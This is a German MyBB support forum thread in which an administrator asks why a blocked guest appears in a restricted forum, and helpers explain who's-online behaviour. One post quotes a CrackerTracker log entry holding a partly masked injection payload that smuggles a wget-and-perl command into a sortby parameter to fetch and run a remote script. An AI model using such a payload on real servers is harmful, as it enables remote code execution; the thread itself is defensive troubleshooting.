Hallo, Gast! (Registrieren)

Wir wünschen allen Besuchern frohe Ostern!

Letzte Ankündigung: MyBB 1.8.37 veröffentlicht (04.11.23)


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste
Gast/Angreifer schwirrt in gesperrten Bereichen herum
#1
Einen schönen Guten Abend ;o)

Wir hatten heute bei uns die Begegnung der dritten Art....

Auf unserer Seite haben wir Bereiche, die für Gäste weder sichtbar, noch betretbar sind.
Versucht ein Gast auf einen geblockten Bereich zu kommen, so steht dort "sieht sich eine Seite ohne benötigte Benutzerrechte an".

Heute hatten wir einen Gast, bei dem da stand "sieht sich das Forum Mitgliedervorstellung an". Ein Forum, das er als Gast weder sehen, noch betreten kann.
Ein Forum, das auch über die explizite Url nicht erreichbar ist.

Wir haben alle Varianten geprüft, wie man als Gast erreichen kann, diese Meldung zu bekommen.... geschafft haben wir es nicht.

Nun waren wir eben in den LogFiles vom CrackTracker.. und siehe da... da steht doch glatt:
Code:
"2008-06-02, 19:00:06, 1212426006, 62.xxx.xx.xxx, fid=5&sortby='];system('wget%20www.xxxpaw.pl/d.pl%20-o%20/tmp/d.pl;perl%20/tmp/d.pl');exit;//http://beuxxx.net/cmd.gif/cmd.gif?&cmd=wget%20www.xxxpaw.pl/d.pl%20-o%20/tmp/d.pl;perl%20/tmp/d.pl;id;, libwww-perl/5.76
(die beinhalteten Urls habe ich unkenntlich gemacht)


Auf welche Art kommt dieser "Eindringling" in diesen Bereich???

Mal abgesehen davon, dass der CT ja allem Anschein nach brav seine Dienste geleistet hat... irgendwie erschließt sich mir das nicht, warum ich eben den Gast sehen konnte, wie er genau in diesem Forum hängt...

Danke schon mal und liebe Grüße


Anschi


PS: An der Stelle hätt ich noch eine Frage...
Warum steht bei einem Gast nur "liest ein Thema" und beim anderen Gast wird der Name des Themas angegeben??? *kopfkratz*
#2
Nabend.

Welche Mybb-Version benutzt Du? Ist diese auf dem neusten Stand?
Welche Plugins benutzt Du? Sind diese auf dem neusten Stand?

Ich kann mir das ganze nur so erklären, dass jemand durch eine Injektion oder durch einen Bug Zutritt zum Board verschafft hat.
Bitte die Suche u. die Doku nutzen.
______________________________

mfg Murphy
#3
Huch... sorry, hab gerade mein Profil korrigiert;
Forensoftware ist natürlich auf dem neusten Stand (1.2.13).

Plugins haben wir:
Geburtstage auf Startseite
Contact Form
CrackerTracker
eMail-Benachrichtigung bei Registrierung
Google-Video-BBCode
YouTube-Video-BBCode
User, die heute online waren
Sideboxes
SpicefuceShoutbox
ThreadViewer
Trash Can Forum
Usermap
Usermap Tools

Die sind alle, soweit überhaupt Neuerungen vorgenommen wurden, auf dem aktuellen Stand... Bis auf die Usermap (V 1.02).
#4
Also Fehler in Mybb sind nicht möglich. Wenn Fehler vorhanden sind, werden diese sofort via Update behoben (wie bei Version 1.2.13). Lücken können nur durch die Plugins entstehen.
Bitte die Suche u. die Doku nutzen.
______________________________

mfg Murphy
#5
Das heißt auf gut Deutsch, dass eines der Plugins fehlerhaft ist?!?!?!?

Nur müsste ich dann ja letztlich ALLE ausschalten, da sich mir nicht erschließt, durch welche Lücke er kam (bzw. ja eigentlich nicht, da ihm der CT ja letztlich wohl einen Tritt in den Hintern gab ;o) )...
#6
Die vom Cracker Tracker abgefangene Anfrage zielt auf eine Sicherheitslücke im MyBB ab, die bereits mit Version 1.2.11 geschlossen wurde. Es wird versucht einen Befehl auf dem Server abzusetzen. Wenn du die aktuelle Version verwendest kann da nichts passieren.
Anschi schrieb:PS: An der Stelle hätt ich noch eine Frage...
Warum steht bei einem Gast nur "liest ein Thema" und beim anderen Gast wird der Name des Themas angegeben??? *kopfkratz*
Vermutlich wurde vom Besucher die showthread.php aufgerufen ohne eine Themen-ID zu übergeben. Daher kann der Anfrage kein Thema zugeordnet werden.
Anschi schrieb:Einen schönen Guten Abend ;o)
Auf welche Art kommt dieser "Eindringling" in diesen Bereich???
Zum eigentlichen Thema: Ist es sicher, dass der Benutzer überhaupt in diesem Bereich war? Beachte folgendes: Wenn du nicht die nötigen Berechtigungen besitzt, d.h. als Gast die Wer ist online-Liste anschaust, steht dort nur "Liest ein Thema". Bist du aber angemeldet und hast die Berechtigungen, wird der Betreff des Themas gezeigt. Das MyBB erkennt den Ort anhand der aufgerufenen URL. Dabei ist es egal, ob der Benutzer wirklich das Thema liest oder nur die Seite angezeigt bekommt, dass ihm die Berechtigungen fehlen.

Gruß,
Michael
[Bild: banner.png]
Support erfolgt NUR im Forum!
Bitte gelöste Themen als "erledigt" markieren.
Beiträge mit mangelhafter Rechtschreibung/Grammatik werden kommentarlos gelöscht.
#7
Puuuh... Danke Michael,

irgendwie wäre es - wenn es auch immer und überall passieren kann - mein persönlicher Gau, wenn unser Board gehackt wird...
Somit dürfen wir diesen Angriff also mit einem Lächeln betrachten ;o).

Was das mit Gast und Thema betrifft, versteh ich das leider immer noch nicht so recht...
2 Beispiele:
1. In unserem Forum bin ich natürlich Admin. Dennoch sehe ich auch als Admin nicht zwingend, in welchem Thema sich ein User befindet. Beim einen steht der genaue Titel, beim anderen lediglich, dass er ein Thema liest.
Gäste können bei uns gar nicht sehen, wer grad online ist ;o)))) ....

2. Auch hier in Deinem Board passiert es... ich gehe (eingeloggt) auf "Wer ist online" und lese beim einen Gast "liest ein Thema" und beim nächsten Gast ist der genaue Ort angegeben...


Sobald bei uns ein Gast auf einen Bereich geht (z.B. Mitgliederliste), der für Gäste gesperrt ist (in dem Fall ist der Bereich aber immerhin durch einen Button für Gäste sichtbar), setzt MyBB es um und schreibt in der "Online-Liste", dass der Gast XY sich eine Seite ohne benötigte Benutzerrechte ansieht"...
Natürlich kann ich nicht mit Sicherheit sagen, dass der "Angreifer" in diesem einen Forum war. Aber:
Das Forum ist über den Gastbereich nicht mal sichtbar. Und selbst wenn er per Zufall einfach an die Url die fid angehängt hat, so wird es in meiner "wer ist online Liste" nicht umgesetzt.
Hab eine Userin gebeten, das Forum aufzurufen, den Link zu kopieren, sich anschl. auszuloggen und als Gast die Url aufzurufen.
Auch in dem Fall wurde nicht der Name des Forums bei ihr als Gast unter "wer ist online" umgesetzt... Bei ihr erschien, dass ihr die benötigten Rechte fehlen und bei mir stand "sieht sich eine Seite ohne benötigte Benutzerrechte an".

Sorry... vermutlich schreib ich grad mega verwirrend, aber ich weiß grad nicht so recht, wie ich das in anständige Worte packen kann...
#8
Es kann sein, dass der Benutzer eine andere Fehlermeldung erhalten, hat oder, dass die keine-Berechtigung-Seite nicht gespeichert wurde. Er sollte trotzdem nichts gesehen haben.
[Bild: banner.png]

Bitte die Foren-Regeln beachten und im Profil die verwendete MyBB-Version angeben.
#9
Bei uns im Forum erscheint bei "Wer ist online",
das der Gast sich an einem "unbekannten Ort" aufhält.
Wenn man darauf anklickt erscheint eine leere Seite .
Hat das was zu bedeuten?
#10
Hallo,

wohin führt der Link, wenn du auf "Unbekannter Ort" klickst?

Gruß,
Michael
[Bild: banner.png]
Support erfolgt NUR im Forum!
Bitte gelöste Themen als "erledigt" markieren.
Beiträge mit mangelhafter Rechtschreibung/Grammatik werden kommentarlos gelöscht.